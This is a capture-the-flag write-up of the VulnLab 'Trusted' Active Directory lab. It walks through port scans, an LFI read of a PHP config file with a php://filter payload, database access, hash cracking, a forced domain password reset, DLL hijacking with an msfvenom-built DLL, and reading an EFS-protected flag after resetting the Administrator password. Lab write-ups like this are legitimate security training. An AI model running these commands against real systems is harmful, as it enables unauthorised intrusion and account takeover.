Trusted is an Active Directory Chain from VulnLab that starts with an LFI leading to MySQL database Access. Then, it follows with a compromise of the child domain and a bidirectional child to parent domain trust exploitation.
PORT STATE SERVICE VERSION 53/tcp open domain Simple DNS Plus 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-11-25 17:23:47Z) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: trusted.vl0., Site: Default-First-Site-Name) 445/tcp open microsoft-ds? 464/tcp open kpasswd5? 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 636/tcp open tcpwrapped 3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: trusted.vl0., Site: Default-First-Site-Name) 3269/tcp open tcpwrapped 3389/tcp open ms-wbt-server Microsoft Terminal Services 5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) 9389/tcp open mc-nmf .NET Message Framing 15289/tcp filtered unknown 27105/tcp filtered unknown 47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) 49664/tcp open msrpc Microsoft Windows RPC 49665/tcp open msrpc Microsoft Windows RPC 49666/tcp open msrpc Microsoft Windows RPC 49667/tcp open msrpc Microsoft Windows RPC 49669/tcp open msrpc Microsoft Windows RPC 49670/tcp open msrpc Microsoft Windows RPC 49673/tcp open msrpc Microsoft Windows RPC 49678/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 49679/tcp open msrpc Microsoft Windows RPC 49690/tcp open msrpc Microsoft Windows RPC 54258/tcp open msrpc Microsoft Windows RPC 54907/tcp open msrpc Microsoft Windows RPC 55168/tcp filtered unknown 58346/tcp filtered unknown 59443/tcp open msrpc Microsoft Windows RPC 64014/tcp filtered unknown Service Info: Host: TRUSTEDDC; OS: Windows; CPE: cpe:/o:microsoft
PORT STATE SERVICE VERSION 53/tcp open domain Simple DNS Plus 80/tcp open http Apache httpd 2.4.53 ((Win64) OpenSSL/1.1.1n PHP/8.1.6) 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-11-2517:31:01Z) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: trusted.vl0., Site: Default-First-Site-Name) 443/tcp open ssl/http Apache httpd 2.4.53 ((Win64) OpenSSL/1.1.1n PHP/8.1.6) 445/tcp open microsoft-ds? 464/tcp open kpasswd5? 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 636/tcp open tcpwrapped 3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: trusted.vl0., Site: Default-First-Site-Name) 3269/tcp open tcpwrapped 3306/tcp open mysql MySQL 5.5.5-10.4.24-MariaDB 3389/tcp open ms-wbt-server Microsoft Terminal Services 5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) 9389/tcp open mc-nmf .NET Message Framing 47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) 49368/tcp open msrpc Microsoft Windows RPC 49664/tcp open msrpc Microsoft Windows RPC 49665/tcp open msrpc Microsoft Windows RPC 49666/tcp open msrpc Microsoft Windows RPC 49667/tcp open msrpc Microsoft Windows RPC 49669/tcp open msrpc Microsoft Windows RPC 49672/tcp open msrpc Microsoft Windows RPC 49677/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 49678/tcp open msrpc Microsoft Windows RPC 49689/tcp open msrpc Microsoft Windows RPC 53399/tcp open msrpc Microsoft Windows RPC 63593/tcp open msrpc Microsoft Windows RPC Service Info: Host: LABDC; OS: Windows; CPE: cpe:/o:microsoft:windows
We start by visiting the web server hosted on port 80 of the 10.10.152.118 machine, and we are in front of of the XAMPP dashboard page
So, we decide to perform directory enumeration on the web server, as follows:
1
gobuster dir -u http://10.10.152.118/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 30
LFI
As we can see, the /dev folder gives access to a webpage
While checking each link in the navbar separately, we stumbled upon a potentially vulnerable lfi parameter. And knowing from the initial scan that this web server is a windows server, then we tried to access the C:\xampp\apache\conf\httpd.conf file, which was successful.
However, in the /dev home page there was an interesting note indicating an issue with a database connection php file, which will help us find our next step for initial access, knowing that there is an MySQL server on this machine.
So we enumerate the /dev webpage for php files in order to search for that database connection file, as follows: gobuster dir -u http://10.10.226.198/dev/ -w /usr/share/wordlists/seclists/Discovery/Web-Content/common.txt -t 30 -x php
The next step is to exploit the LFI to access the db.php file from the web server. To do that, we only have to base64 encode the output of that file, as follows: http://10.10.226.198/dev/index.html?view=php://filter/convert.base64-encode/resource=db.php
Using these credentials, we successfully accessed the MariaDB database
1
mysql -u "root" -p -h 10.10.226.198
By enumerating the databases in the mysql server, we decided to enumerate the news database for its users table and found the following credentials
Using hashcat with the rockyou.txt wordlist, we only arrived to crack the first MD5 hash of rsmith which appears to be a valid domain user of the lab.trusted.vl domain
We can see that from rsmith* we have to forcechangepassword on ewalters to get a foothold into LABDC.lab.trusted.vl
1
net rpc password "ewalters""P@ssword2024" -U "lab.trusted.vl"/"rsmith"%"IHateEric2" -S "LABDC.lab.trusted.vl"
We can see that the password successfully changed
Afterwards, we PsRemote into the DC as ewalters evil-winrm -u "lab.trusted.vl\ewalters" -p "P@ssword2024" -i 10.10.226.198
DLL Hijacking
We stumble upon KasperskyRemoval.exe which appears to be run as cpowers (Christine) which should be our next user to be compromised.
We decide to copy that executable to our local Windows Machine and use Procmon to check for the executable behaviour.
After running it, we apply a filter for Kaspersky Removal in Procmon.
And a filter for dll files only within that process
Scrolling through the DLL files loaded by that process, we found that it calls for DLLs within the local executable path (In this case inside the Desktop folder) with NAME_NOT_FOUND. This supposes that we can insert our own DLL file inside that folder to perform DLL Hijacking.
For that purpose, we additionally added a filter for the unfound DLLs that could be hijacked
This leaves us with the KasperkyRemovalToolENU.dll, so using msfvenom we will create a new DLL with the same name KasperkyRemovalToolENU.dll inside the local directory
Now the next step will be to become DA on the parent domain trusted.vl that we mapped during our bloodhound enumeration in a child-to-parent domain trust attack
For that we would need the SID of the child and parent domains
However, even though we have System privileges on the machine, we cannot access the root.txt file on the Administrator’s Desktop folder.
The access denied was due to EFS encryption (a Windows feature that allows users to encrypt individual files or folders on their computer so that only authorized users can access them, ensuring that even if someone gains unauthorized access to the physical storage, they cannot read the encrypted files without the decryption key), after running:
The solution was to first change the administrator password net user Administrator Password_123 then use RunasCs to execute the cmd.exe process as the administrator user with his new password
1
.\runasCs.exe Administrator Password_123 "cmd.exe /c type C:\Users\Administrator\Desktop\root.txt"
